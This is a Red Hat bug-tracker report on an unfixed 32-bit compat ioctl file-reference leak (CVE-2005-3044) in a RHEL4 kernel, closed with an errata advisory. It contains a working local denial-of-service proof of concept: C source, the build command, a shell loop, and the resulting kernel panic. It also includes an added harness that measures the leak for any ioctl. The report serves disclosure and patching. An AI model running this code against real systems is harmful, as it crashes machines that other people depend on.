SWsoft Virtuozzo/OpenVZ Linux kernel team would like to note that the first part of CVE-2005-3044 ("fput in a 32-bit ioctl on 64-bit x86 systems") is still not fixed in the RHEL4 kernel 2.6.9-42.0.8. As a result, local users are able to cause a denial of service. The following patch fixes this problem in Linux mainstream:

http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=35311d6478077f7bfe35c1c653193e658bf32686

The following script demonstrates the resource leakage:

[vvs@dhcp17-60 ~]$ uname -a
Linux dhcp17-60.qa.sw.ru 2.6.9-42.0.8.EL #1 Tue Jan 23 12:34:49 EST 2007 x86_64 x86_64 x86_64 GNU/Linux
[vvs@dhcp17-60 ~]$ id
uid=500(vvs) gid=500(vvs) groups=500(vvs) context=user_u:system_r:unconfined_t
[vvs@dhcp17-60 ~]$ cat tiocgdev.c
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/* TIOCGDEV is the ioctl whose 32-bit compat handler takes a file
 * reference (fget) and never releases it (fput). */
#define TIOCGDEV _IOR('T',0x32, unsigned int)

int main(int argc, char *argv[])
{
	int fd, ret;

	/* any open file will do; the binary itself is always there */
	fd = open(argv[0], O_RDONLY);
	if (fd < 0) {
		perror("open");
		return 1;
	}
	/* the call fails (NULL argument), but the reference taken on
	 * the way in is still leaked on the affected kernel */
	ret = ioctl(fd, TIOCGDEV, NULL);
	if (ret < 0) {
		perror("ioctl");
		return 1;
	}
	return 0;
}
[vvs@dhcp17-60 ~]$ gcc -m32 -o tiocgdev32 tiocgdev.c --static
[vvs@dhcp17-60 ~]$ cat /proc/sys/fs/file-nr
528	0	24581
[vvs@dhcp17-60 ~]$ for i in `seq 1 10000` ; do ./tiocgdev32 &>/dev/null ; done
[vvs@dhcp17-60 ~]$ cat /proc/sys/fs/file-nr
10452	0	24581

Exploit overflows the file->f_count and crashes the node:

Unable to handle kernel NULL pointer dereference at 0000000000000038
RIP: <ffffffff80199606>{vfs_getattr+24}
PML4 5cf1067 PGD 8765067 PMD 0
Oops: 0000 [1]
CPU 0
Modules linked in: md5 ipv6 parport_pc lp parport autofs4 sunrpc ds yenta_socket pcmcia_core ipt_REJECT ipt_state ip_conntrack iptable_filter ip_tables dm_mirror button battery ac uhci_hcd snd_ens1371 snd_rawmidi snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd_page_alloc snd_ac97_codec snd soundcore e1000 floppy ext3 jbd dm_mod mptscsih mptsas mptspi mptfc mptscsi mptbase sd_mod scsi_mod
Pid: 3753, comm: tiocgdev32 Not tainted 2.6.9-42.0.8.EL
RIP: 0010:[<ffffffff80199606>] <ffffffff80199606>{vfs_getattr+24}
RSP: 0000:0000010008e69ea8  EFLAGS: 00010206
RAX: ffffffff80449cc0 RBX: 0000000000000000 RCX: 0000010008ec8148
RDX: 0000010008e69ef8 RSI: 0000000000000000 RDI: 0000000000000000
RBP: 0000010008e69ef8 R08: 0000010008ec8140 R09: 00000000ffffd854
R10: 0000010008e68000 R11: 0000000000000000 R12: 0000010008e69ef8
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
FS:  0000002a96a2d2a0(0000) GS:ffffffff80545480(0000) knlGS:00000000f7ff58e0
CS:  0010 DS: 002b ES: 002b CR0: 000000008005003b
CR2: 0000000000000038 CR3: 0000000000101000 CR4: 00000000000006e0
Process tiocgdev32 (pid: 3753, threadinfo 0000010008e68000, task 0000010009020030)
Stack: 0000010008ec8140 000001000929dcc0 00000000fffffff7 0000010008e69ef8
       0000000000000000 ffffffff80199738 00000000ffffd7a8 00000000ffffd854
       0000000000000000 ffffffff80127e9f
Call Trace:<ffffffff80199738>{vfs_fstat+41} <ffffffff80127e9f>{sys32_fstat64+17}
       <ffffffff801c2587>{compat_sys_ioctl+906} <ffffffff8018dbbb>{sys_write+69}
       <ffffffff80127991>{ia32_sysret+0}

Code: 4c 8b 66 38 ff 90 a0 01 00 00 85 c0 75 6e 49 8b 84 24 70 01
RIP <ffffffff80199606>{vfs_getattr+24} RSP <0000010008e69ea8>
CR2: 0000000000000038
<0>Kernel panic - not syncing: Oops
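The shell loop in the report measures the leak by hand: one process per ioctl call, then a before/after reading of /proc/sys/fs/file-nr. The following harness is an added example (editor's code, not part of the bug report or of the SWsoft script) that does the same measurement in one program for any ioctl request number, so the result can be expressed as "leaked struct file objects per child". It assumes the three-column "allocated free max" format of /proc/sys/fs/file-nr and that a leaked reference survives the child's exit (which is exactly what the report's numbers show). The leak itself is only reproduced when the binary is built with -m32 and run on an affected x86_64 kernel such as 2.6.9-42.0.8.EL; on a fixed kernel TIOCGDEV on a regular file fails with ENOTTY and the rate stays at about zero.

```c
/*
 * leakcheck.c - fork-per-call harness for spotting a struct file leak in an
 * ioctl handler (a missing fput() after fget()), generalising the shell
 * loop from the bug report. Build with -m32 on x86_64 to hit the 32-bit
 * compat ioctl path that the report is about.
 *
 *   gcc -m32 -static -o leakcheck32 leakcheck.c && ./leakcheck32 10000
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

#ifndef TIOCGDEV
#define TIOCGDEV _IOR('T', 0x32, unsigned int)
#endif

/* Parse one /proc/sys/fs/file-nr line ("allocated free max", tab or space
 * separated) and return the number of allocated struct file objects, or
 * -1 if the line does not have that shape. */
long parse_file_nr(const char *line)
{
    unsigned long allocated, nr_free, nr_max;

    if (sscanf(line, "%lu %lu %lu", &allocated, &nr_free, &nr_max) != 3)
        return -1;
    return (long)allocated;
}

/* Read the current allocated count from the kernel (-1 on failure). */
long read_file_nr(void)
{
    char buf[128];
    FILE *f = fopen("/proc/sys/fs/file-nr", "r");

    if (!f)
        return -1;
    if (!fgets(buf, sizeof buf, f)) {
        fclose(f);
        return -1;
    }
    fclose(f);
    return parse_file_nr(buf);
}

/* Leaked struct file objects per child, from before/after counts.
 * A correct handler leaves the count unchanged once all children have
 * exited; a handler that forgets fput() shows roughly 1.0 per child.
 * Returns a negative value for unusable input. */
double leak_rate(long before, long after, int children)
{
    if (before < 0 || after < 0 || children <= 0)
        return -1.0;
    return (double)(after - before) / (double)children;
}

/* Open `path` and issue `req` in a child that exits immediately, so that
 * anything still referenced after exit_files() is a leaked struct file.
 * Returns 0 once the child has been reaped, -1 if fork() failed. */
int run_child(const char *path, unsigned long req)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd = open(path, O_RDONLY);
        if (fd >= 0)
            ioctl(fd, req, NULL); /* an error return is expected here */
        _exit(0);
    }
    waitpid(pid, &status, 0);
    return 0;
}

int main(int argc, char *argv[])
{
    int i, n = argc > 1 ? atoi(argv[1]) : 1000;
    long before, after;

    before = read_file_nr();
    for (i = 0; i < n; i++) {
        if (run_child(argv[0], TIOCGDEV) < 0) {
            perror("fork");
            return 1;
        }
    }
    after = read_file_nr();
    if (before < 0 || after < 0) {
        fprintf(stderr, "cannot read /proc/sys/fs/file-nr\n");
        return 1;
    }
    printf("file-nr allocated: %ld -> %ld after %d children "
           "(%.2f leaked per child)\n",
           before, after, n, leak_rate(before, after, n));
    return 0;
}
```

Applied to the numbers in the report (528 allocated before, 10452 after 10000 runs) the rate is 0.99, i.e. one struct file per process: the only reason it is not exactly 1.0 is that file-nr also counts the files legitimately open when it is sampled. The request number is a parameter so the same harness can be pointed at any other compat ioctl suspected of the same fget()/fput() imbalance.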
Ok, so this is a dup of Bug 227978 for z-stream? If so maybe Jeff should take it, since he did the original work in the other bug? I'm happy to ferry this in for z-stream, but it seems like "his" bug, so I'll give him first crack at it. :) -Eric
Talked with Jeff... over to him since he did the original work. -Eric
committed in stream rhel-4.5.z build 55.0.1
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHSA-2007-0488.html